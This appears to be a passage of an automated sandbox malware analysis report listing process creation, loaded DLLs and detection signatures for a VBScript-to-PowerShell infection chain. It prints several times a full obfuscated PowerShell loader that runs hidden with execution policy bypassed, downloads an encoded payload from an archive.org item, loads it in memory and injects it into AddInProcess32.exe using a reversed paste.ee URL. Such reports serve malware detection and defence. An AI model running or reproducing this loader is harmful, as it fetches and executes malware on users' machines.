            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdldC1WQVJJQWJMZSAnKk1EcionKS5OYU1lWzMsMTEsMl0tSm9JbicnKSAoKCgnazgnKydmdScrJ3InKydsID0gYzlJaHR0cHM6Ly9pYScrJzYwMDEwMC51cy4nKydhJysncmNoaXZlJysnLm9yZy8yNC9pdGVtcy9kZXRhaC1ub3RlLXYvRGV0YScrJ2hOb3RlVi50eHRjJysnOUk7azhmYicrJ2FzJysnZTY0Q29udCcrJ2VudCA9ICcrJyhOJysnZXctTycrJ2JqZWN0JysnIFN5c3RlbScrJy5OZXQuV2ViQ2xpZW50KS4nKydEb3dubG9hZCcrJ1N0JysncmluJysnZyhrOGZ1cmwpJysnO2snKyc4ZmJpbmEnKydyeUMnKydvbnRlbnQgPScrJyBbJysnU3knKydzdGVtLkMnKydvbnYnKydlJysncnRdOicrJzpGcm9tQmFzZScrJzY0U3RyaW5nKGs4ZmJhc2U2NEMnKydvbnQnKydlbnQnKycpO2s4ZmFzc2VtYmx5ID0gWycrJ1JlZmxlY3Rpb24uQXNzZW1ibHldJysnOjonKydMb2FkKCcrJ2s4ZicrJ2JpbmFyeUNvbnQnKydlbnQpO2s4ZicrJ3R5cGUgJysnPScrJyBrOGZhc3NlbScrJ2JsJysneS4nKydHZXRUeXAnKydlJysnKGM5JysnSVJ1blBFLkgnKydvbWVjOUkpOycrJ2s4ZicrJ21ldGhvZCA9ICcrJ2snKyc4ZnR5cGUnKycuR2V0TWV0JysnaG9kKGM5SVZBSWM5SSk7JysnazhmbWV0aG9kLkludicrJ29rZShrOGZudWxsLCcrJyBbb2InKydqZScrJ2N0W11dQChjOUkwL29Tc2tXL2QvZWUuJysnZScrJ3RzYXAvLycrJzpzcHR0aGM5SSAsJysnIGM5JysnSWQnKydlcycrJ2F0aXYnKydhZCcrJ29jOUknKycgJysnLCBjOUknKydkZXNhdGknKyd2YWRvYzknKydJICwgYzknKydJZGVzJysnYXRpdmFkb2M5SSxjJysnOUlBZGRJblByb2Nlc3MzMmM5SSxjOUljOUkpJysnKScpICAtY1JFcGxBQ0UgKFtDSGFSXTk5K1tDSGFSXTU3K1tDSGFSXTczKSxbQ0hhUl0zOSAgLXJFcExBY0UnazhmJyxbQ0hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method = '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')') -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39 -rEpLAcE'k8f',[CHaR]36) )"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000004.00000002.2295468999.000001B0A7DC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2268054152.000001B0A0747000.00000004.00000800.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            VBScript performs obfuscated calls to suspicious functions
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell -command $Codigo = 'LiAoKGdldC1WQVJJQWJMZSAnKk1EcionKS5OYU1lWzM", "0", "false");
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'LiAoKGdldC1WQVJJQWJMZSAnKk1EcionKS5OYU1lWzMsMTEsMl0tSm9JbicnKSAoKCgnazgnKydmdScrJ3InKydsID0gYzlJaHR0cHM6Ly9pYScrJzYwMDEwMC51cy4nKydhJysncmNoaXZlJysnLm9yZy8yNC9pdGVtcy9kZXRhaC1ub3RlLXYvRGV0YScrJ2hOb3RlVi50eHRjJysnOUk7azhmYicrJ2FzJysnZTY0Q29udCcrJ2VudCA9ICcrJyhOJysnZXctTycrJ2JqZWN0JysnIFN5c3RlbScrJy5OZXQuV2ViQ2xpZW50KS4nKydEb3dubG9hZCcrJ1N0JysncmluJysnZyhrOGZ1cmwpJysnO2snKyc4ZmJpbmEnKydyeUMnKydvbnRlbnQgPScrJyBbJysnU3knKydzdGVtLkMnKydvbnYnKydlJysncnRdOicrJzpGcm9tQmFzZScrJzY0U3RyaW5nKGs4ZmJhc2U2NEMnKydvbnQnKydlbnQnKycpO2s4ZmFzc2VtYmx5ID0gWycrJ1JlZmxlY3Rpb24uQXNzZW1ibHldJysnOjonKydMb2FkKCcrJ2s4ZicrJ2JpbmFyeUNvbnQnKydlbnQpO2s4ZicrJ3R5cGUgJysnPScrJyBrOGZhc3NlbScrJ2JsJysneS4nKydHZXRUeXAnKydlJysnKGM5JysnSVJ1blBFLkgnKydvbWVjOUkpOycrJ2s4ZicrJ21ldGhvZCA9ICcrJ2snKyc4ZnR5cGUnKycuR2V0TWV0JysnaG9kKGM5SVZBSWM5SSk7JysnazhmbWV0aG9kLkludicrJ29rZShrOGZudWxsLCcrJyBbb2InKydqZScrJ2N0W11dQChjOUkwL29Tc2tXL2QvZWUuJysnZScrJ3RzYXAvLycrJzpzcHR0aGM5SSAsJysnIGM5JysnSWQnKydlcycrJ2F0aXYnKydhZCcrJ29jOUknKycgJysnLCBjOUknKydkZXNhdGknKyd2YWRvYzknKydJICwgYzknKydJZGVzJysnYXRpdmFkb2M5SSxjJysnOUlBZGRJblByb2Nlc3MzMmM5SSxjOUljOUkpJysnKScpICAtY1JFcGxBQ0UgKFtDSGFSXTk5K1tDSGFSXTU3K1tDSGFSXTczKSxbQ0hhUl0zOSAgLXJFcExBY0UnazhmJyxbQ0hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
            Obfuscated command line found
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method = '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')') -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39 -rEpLAcE'k8f',[CHaR]36) )"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method = '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')') -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39 -rEpLAcE'k8f',[CHaR]36) )"Jump to behavior
            Suspicious powershell command line found
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdldC1WQVJJQWJMZSAnKk1EcionKS5OYU1lWzMsMTEsMl0tSm9JbicnKSAoKCgnazgnKydmdScrJ3InKydsID0gYzlJaHR0cHM6Ly9pYScrJzYwMDEwMC51cy4nKydhJysncmNoaXZlJysnLm9yZy8yNC9pdGVtcy9kZXRhaC1ub3RlLXYvRGV0YScrJ2hOb3RlVi50eHRjJysnOUk7azhmYicrJ2FzJysnZTY0Q29udCcrJ2VudCA9ICcrJyhOJysnZXctTycrJ2JqZWN0JysnIFN5c3RlbScrJy5OZXQuV2ViQ2xpZW50KS4nKydEb3dubG9hZCcrJ1N0JysncmluJysnZyhrOGZ1cmwpJysnO2snKyc4ZmJpbmEnKydyeUMnKydvbnRlbnQgPScrJyBbJysnU3knKydzdGVtLkMnKydvbnYnKydlJysncnRdOicrJzpGcm9tQmFzZScrJzY0U3RyaW5nKGs4ZmJhc2U2NEMnKydvbnQnKydlbnQnKycpO2s4ZmFzc2VtYmx5ID0gWycrJ1JlZmxlY3Rpb24uQXNzZW1ibHldJysnOjonKydMb2FkKCcrJ2s4ZicrJ2JpbmFyeUNvbnQnKydlbnQpO2s4ZicrJ3R5cGUgJysnPScrJyBrOGZhc3NlbScrJ2JsJysneS4nKydHZXRUeXAnKydlJysnKGM5JysnSVJ1blBFLkgnKydvbWVjOUkpOycrJ2s4ZicrJ21ldGhvZCA9ICcrJ2snKyc4ZnR5cGUnKycuR2V0TWV0JysnaG9kKGM5SVZBSWM5SSk7JysnazhmbWV0aG9kLkludicrJ29rZShrOGZudWxsLCcrJyBbb2InKydqZScrJ2N0W11dQChjOUkwL29Tc2tXL2QvZWUuJysnZScrJ3RzYXAvLycrJzpzcHR0aGM5SSAsJysnIGM5JysnSWQnKydlcycrJ2F0aXYnKydhZCcrJ29jOUknKycgJysnLCBjOUknKydkZXNhdGknKyd2YWRvYzknKydJICwgYzknKydJZGVzJysnYXRpdmFkb2M5SSxjJysnOUlBZGRJblByb2Nlc3MzMmM5SSxjOUljOUkpJysnKScpICAtY1JFcGxBQ0UgKFtDSGFSXTk5K1tDSGFSXTU3K1tDSGFSXTczKSxbQ0hhUl0zOSAgLXJFcExBY0UnazhmJyxbQ0hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method = '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')') -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39 -rEpLAcE'k8f',[CHaR]36) )"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdldC1WQVJJQWJMZSAnKk1EcionKS5OYU1lWzMsMTEsMl0tSm9JbicnKSAoKCgnazgnKydmdScrJ3InKydsID0gYzlJaHR0cHM6Ly9pYScrJzYwMDEwMC51cy4nKydhJysncmNoaXZlJysnLm9yZy8yNC9pdGVtcy9kZXRhaC1ub3RlLXYvRGV0YScrJ2hOb3RlVi50eHRjJysnOUk7azhmYicrJ2FzJysnZTY0Q29udCcrJ2VudCA9ICcrJyhOJysnZXctTycrJ2JqZWN0JysnIFN5c3RlbScrJy5OZXQuV2ViQ2xpZW50KS4nKydEb3dubG9hZCcrJ1N0JysncmluJysnZyhrOGZ1cmwpJysnO2snKyc4ZmJpbmEnKydyeUMnKydvbnRlbnQgPScrJyBbJysnU3knKydzdGVtLkMnKydvbnYnKydlJysncnRdOicrJzpGcm9tQmFzZScrJzY0U3RyaW5nKGs4ZmJhc2U2NEMnKydvbnQnKydlbnQnKycpO2s4ZmFzc2VtYmx5ID0gWycrJ1JlZmxlY3Rpb24uQXNzZW1ibHldJysnOjonKydMb2FkKCcrJ2s4ZicrJ2JpbmFyeUNvbnQnKydlbnQpO2s4ZicrJ3R5cGUgJysnPScrJyBrOGZhc3NlbScrJ2JsJysneS4nKydHZXRUeXAnKydlJysnKGM5JysnSVJ1blBFLkgnKydvbWVjOUkpOycrJ2s4ZicrJ21ldGhvZCA9ICcrJ2snKyc4ZnR5cGUnKycuR2V0TWV0JysnaG9kKGM5SVZBSWM5SSk7JysnazhmbWV0aG9kLkludicr